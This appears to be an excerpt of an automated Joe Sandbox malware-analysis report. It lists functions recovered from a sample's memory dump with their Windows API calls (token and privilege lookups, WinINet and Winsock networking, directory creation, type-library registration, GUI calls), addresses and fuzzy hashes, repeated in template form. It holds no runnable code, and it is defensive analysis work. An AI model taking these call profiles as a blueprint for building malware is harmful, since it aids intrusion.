DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0065B9AB,?,?,?), ref: 006AC56E

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 244ac78e87aaa4d26e682e532be40d86953a55110b8edd7e569435f14db4fde2
Instruction ID: c1b9f3ab19061e9d2ef5b60c6ed9d4f6a1ac3be79b15b3b12a1bc79f7676698c
Opcode Fuzzy Hash: 244ac78e87aaa4d26e682e532be40d86953a55110b8edd7e569435f14db4fde2
Instruction Fuzzy Hash: 77316435900558EFCB159F58C854DEA7BB7EF0A320F444159F9058B361C7316D61DF94

Function 00678656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0067810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00678121
Part of subcall function 0067810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0067812B
Part of subcall function 0067810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0067813A
Part of subcall function 0067810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00678141
Part of subcall function 0067810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00678157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006786A3
_memcmp.LIBCMT ref: 006786C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 006786FC
HeapFree.KERNEL32(00000000), ref: 00678703

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: f89efd2e262125ba58783d1a00be4b49e5f661e33226cb3530f0638af3012a4a
Instruction ID: 50b620f2522e5dfaf5256ceb19e0cfdc3fbd55548ef2622067217efa67aa4d02
Opcode Fuzzy Hash: f89efd2e262125ba58783d1a00be4b49e5f661e33226cb3530f0638af3012a4a
Instruction Fuzzy Hash: C7217A71E80109EFDB10DFA4C949BEEB7BAEF55304F158099E448AB240DB31AE05CFA0

Function 0064098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 006409AE

Part of subcall function 00625A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00687896,?,?,00000000), ref: 00625A2C
Part of subcall function 00625A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00687896,?,?,00000000,?,?), ref: 00625A50

_fprintf.LIBCMT ref: 006409E5
OutputDebugStringW.KERNEL32(?), ref: 00675DBB

Part of subcall function 00644AAA: _flsall.LIBCMT ref: 00644AC3

__setmode.LIBCMT ref: 00640A1A

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: d8080f0d8fc36890b6e609774300ac82daa43a358972200e5af399e620b97709
Instruction ID: 8962f45e93e11870e659f1f58ef78b3600d2fe989fa464ef7e5b206ddec72adf
Opcode Fuzzy Hash: d8080f0d8fc36890b6e609774300ac82daa43a358972200e5af399e620b97709
Instruction Fuzzy Hash: 6E1127319046146FDB44B7B4AC87AFE7B6B9F42320F64415DF20557282EE70598247AD

Function 00691767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006917A3

Part of subcall function 0069182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0069184C
Part of subcall function 0069182D: InternetCloseHandle.WININET(00000000), ref: 006918E9

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: a2e8b67f0ac1252791dd254a04fe36224603c993fe1627e133e63c66c56381e3
Instruction ID: 8f2fa58772ff193cea65bd548ee75c02c6f7e332e33fcdd58d204f2c1e3804ee
Opcode Fuzzy Hash: a2e8b67f0ac1252791dd254a04fe36224603c993fe1627e133e63c66c56381e3
Instruction Fuzzy Hash: CF218331200606BFDF125FA0DC41BBAB7EFFB4A710F204429F9119AA50D771D811ABA5

Function 00683A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,006AFAC0), ref: 00683A64
GetLastError.KERNEL32 ref: 00683A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00683A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,006AFAC0), ref: 00683ADF

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 5bc45dbb05221ff0d9af691a2355c145084f6a85e19a3508e227d3b8f1f5887e
Instruction ID: f4d2be889d877a3499321352a44255d5e0aef7d155aaa71d013ba37d233dc696
Opcode Fuzzy Hash: 5bc45dbb05221ff0d9af691a2355c145084f6a85e19a3508e227d3b8f1f5887e
Instruction Fuzzy Hash: 7721B1745082118F8314FF68D8818AA77E6AF16764F104A2DF499C73A1D7319E46CF82

Function 006550E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00655101

Part of subcall function 0064571C: __FF_MSGBANNER.LIBCMT ref: 00645733
Part of subcall function 0064571C: __NMSG_WRITE.LIBCMT ref: 0064573A
Part of subcall function 0064571C: RtlAllocateHeap.NTDLL(01660000,00000000,00000001,00000000,?,?,?,00640DD3,?), ref: 0064575F

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 63e78b1bf21ede77dc6bcc770e5314ac1910b947ff7cb605f5e009d22536aaca
Instruction ID: 0dda64bc94044ac03fe9561dbb55e9eaa08e9029b385832ba7ed3c07b8b748d3
Opcode Fuzzy Hash: 63e78b1bf21ede77dc6bcc770e5314ac1910b947ff7cb605f5e009d22536aaca
Instruction Fuzzy Hash: 2511BF72900E11AFCF313FB0A86D79D3B9B9B013A2F10052EFD469A251DE3489459A98

Function 006244A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006244CF

Part of subcall function 0062407C: _memset.LIBCMT ref: 006240FC
Part of subcall function 0062407C: _wcscpy.LIBCMT ref: 00624150
Part of subcall function 0062407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00624160

KillTimer.USER32(?,00000001,?,?), ref: 00624524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00624533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0065D4B9

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 098925b072779167b87f18c867cea1b63e5f3316034560c6b9d4af5597091e5e
Instruction ID: 0c02a31c60d1a05484944b3e748c8f2a8056c8ab1aaeac2e81ce55bb60ecbcf9
Opcode Fuzzy Hash: 098925b072779167b87f18c867cea1b63e5f3316034560c6b9d4af5597091e5e
Instruction Fuzzy Hash: C9210770904794AFE732DB249855BE6BBEE9F05309F04009DE7CE5A282C7746A89CB52

Function 00696369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00625A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00687896,?,?,00000000), ref: 00625A2C
Part of subcall function 00625A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00687896,?,?,00000000,?,?), ref: 00625A50

gethostbyname.WSOCK32(?), ref: 00696399
WSAGetLastError.WSOCK32(00000000), ref: 006963A4
_memmove.LIBCMT ref: 006963D1
inet_ntoa.WSOCK32(?), ref: 006963DC

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: e219b6550425c304bd388b17f7880f9b4e7e6d813ad4fb9fc2cf736065227a16
Instruction ID: c446d560d129af2cb4a7128e7aa4775f5702fe8cca614dc8bdba539a4f7af252
Opcode Fuzzy Hash: e219b6550425c304bd388b17f7880f9b4e7e6d813ad4fb9fc2cf736065227a16
Instruction Fuzzy Hash: 49116032900519AFCF40FFA4ED46CEEB7BAAF55310B144069F506A7261DB30AE14DF65

Function 00678B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00678B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00678B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00678B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00678BA4

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4ab21975033981825207686894a728092c408b234f743c87b844e45771c01233
Instruction ID: baa69d049a976ecc9b3e8033d7ee299c9efefa8a9d9a15aaee5da3cd6410f86e
Opcode Fuzzy Hash: 4ab21975033981825207686894a728092c408b234f743c87b844e45771c01233
Instruction Fuzzy Hash: A3115A79940218FFEB10DFA5CC84FADBBB9FB48710F2040A5EA04B7290DA716E11DB94

Function 00621290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

DefDlgProcW.USER32(?,00000020,?), ref: 006212D8
GetClientRect.USER32(?,?), ref: 0065B5FB
GetCursorPos.USER32(?), ref: 0065B605
ScreenToClient.USER32(?,?), ref: 0065B610

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 5acce0a4ac4873de349a1b815877714f5a3c010ce3702f480a97f3ad711bb31a
Instruction ID: 2965535efb183e7c999a56ead333c13767287fc14209edb849e63819c14c6685
Opcode Fuzzy Hash: 5acce0a4ac4873de349a1b815877714f5a3c010ce3702f480a97f3ad711bb31a
Instruction Fuzzy Hash: C6116D35905429EFCB10EFA4E8859EE77BAEB16300F000455F901EB241C730BA918FA9

Function 0067D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0067D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0067D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0067D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0067D897

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 63048bbe5636159b62130655efa8ffec98ec48f40586688bbabb4d9c74bc1652
Instruction ID: 332c1e124d0a7533c0004f2b3261882a6666b8aa6be7aaf79b4b2e60c1b9a01e
Opcode Fuzzy Hash: 63048bbe5636159b62130655efa8ffec98ec48f40586688bbabb4d9c74bc1652
Instruction Fuzzy Hash: A9116175605304DBE3209F90DC08F93BBFDEF04B00F108A69E55AD6591D7B0E9499FA2

Function 00656FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00656FDB

Part of subcall function 006576C2: __fltout2.LIBCMT ref: 006576EB

__cftog_l.LIBCMT ref: 00657001
__cftoe_l.LIBCMT ref: 00657033

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: a6c3eda0256bf3146134be21775d41fe872b6c88d081678ecb2ea756317449fd
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 0F014CB244814ABBCF165F84EC01CEE3FA7BB18356F588415FE1859171D236C9BAAB81

Function 006AB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 006AB2E4
ScreenToClient.USER32(?,?), ref: 006AB2FC
ScreenToClient.USER32(?,?), ref: 006AB320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 006AB33B

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 377ae6a9cd6164012e9225653ef7b8da3f302aea6ca82c2d5c2d033628dcdce8
Instruction ID: 845ddb95cd4460d8378406476ea3ca15f891c76e7c09beb16ddcf5a970fd4315
Opcode Fuzzy Hash: 377ae6a9cd6164012e9225653ef7b8da3f302aea6ca82c2d5c2d033628dcdce8
Instruction Fuzzy Hash: C31174B9D00209EFDB01DFA9C8849EEBBF9FF09310F109166E914E3220D731AA518F91

Function 00686BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00686BE6

Part of subcall function 006876C4: _memset.LIBCMT ref: 006876F9

_memmove.LIBCMT ref: 00686C09
_memset.LIBCMT ref: 00686C16
LeaveCriticalSection.KERNEL32(?), ref: 00686C26

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: c819c113b42cc70edcaaf19db8b082975d87e00dd572edd5d46c59c3430b20a0
Instruction ID: c01fe36a872810f27267b955c66fd42ebeabfa13122e75b09011b2c7dbba6cc6
Opcode Fuzzy Hash: c819c113b42cc70edcaaf19db8b082975d87e00dd572edd5d46c59c3430b20a0
Instruction Fuzzy Hash: F7F05E3A200100BBCF817F95DC85A8ABB2AEF46321F148065FE085F227D731E911CBB9

Function 00622218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00622231
SetTextColor.GDI32(?,000000FF), ref: 0062223B
SetBkMode.GDI32(?,00000001), ref: 00622250
GetStockObject.GDI32(00000005), ref: 00622258
GetWindowDC.USER32(?,00000000), ref: 0065BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 0065BE90
GetPixel.GDI32(00000000,?,00000000), ref: 0065BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 0065BEC2
GetPixel.GDI32(00000000,?,?), ref: 0065BEE2
ReleaseDC.USER32(?,00000000), ref: 0065BEED

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 57d56ccf8b635fc475592319963df03fe56a9380ee7118cdcd08b482916526f7
Instruction ID: 5b747245a88cdf5a0e9c4acc820eda86446a809ec15218d845a516aab4629b21
Opcode Fuzzy Hash: 57d56ccf8b635fc475592319963df03fe56a9380ee7118cdcd08b482916526f7
Instruction Fuzzy Hash: 1DE03932504244EADB216FA4FC0D7D83B12EB16332F1493A6FA69480E187724984DF22

Function 00678712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0067871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,006782E6), ref: 00678722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006782E6), ref: 0067872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,006782E6), ref: 00678736

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 599a1aa206e2877b6037641aae3f964d641e13cb3709255089491b179a54bb0c
Instruction ID: b9d9abffb9cc80d01388495062ed2094af2626be0993820b09fdb1e80502760b
Opcode Fuzzy Hash: 599a1aa206e2877b6037641aae3f964d641e13cb3709255089491b179a54bb0c
Instruction Fuzzy Hash: C0E086366512119FD7606FF05D0CF9B7BAEEF52791F148828B24ACA040DA349841CF51

Function 00626240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%k, xrefs: 0062624E

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID: %k
API String ID: 0-3601005739
Opcode ID: cc78ab6e67d0881967133176f05c2d22cddb0be5dd2d813b116576fcb3b4d285
Instruction ID: 48c99a68fb9b9f44d2e198e3d1c38fd6894c4ec3f31ac0fdc2751b5f67c5ecb8
Opcode Fuzzy Hash: cc78ab6e67d0881967133176f05c2d22cddb0be5dd2d813b116576fcb3b4d285
Instruction Fuzzy Hash: 4FB1A371800929DACF24EF94E8819FDB7B7EF44310F10812AF942A7291DB309E86CF95

Function 0069AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0069AFAE

Strings

xbn, xrefs: 0069B010
xbn, xrefs: 0069AFE4

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
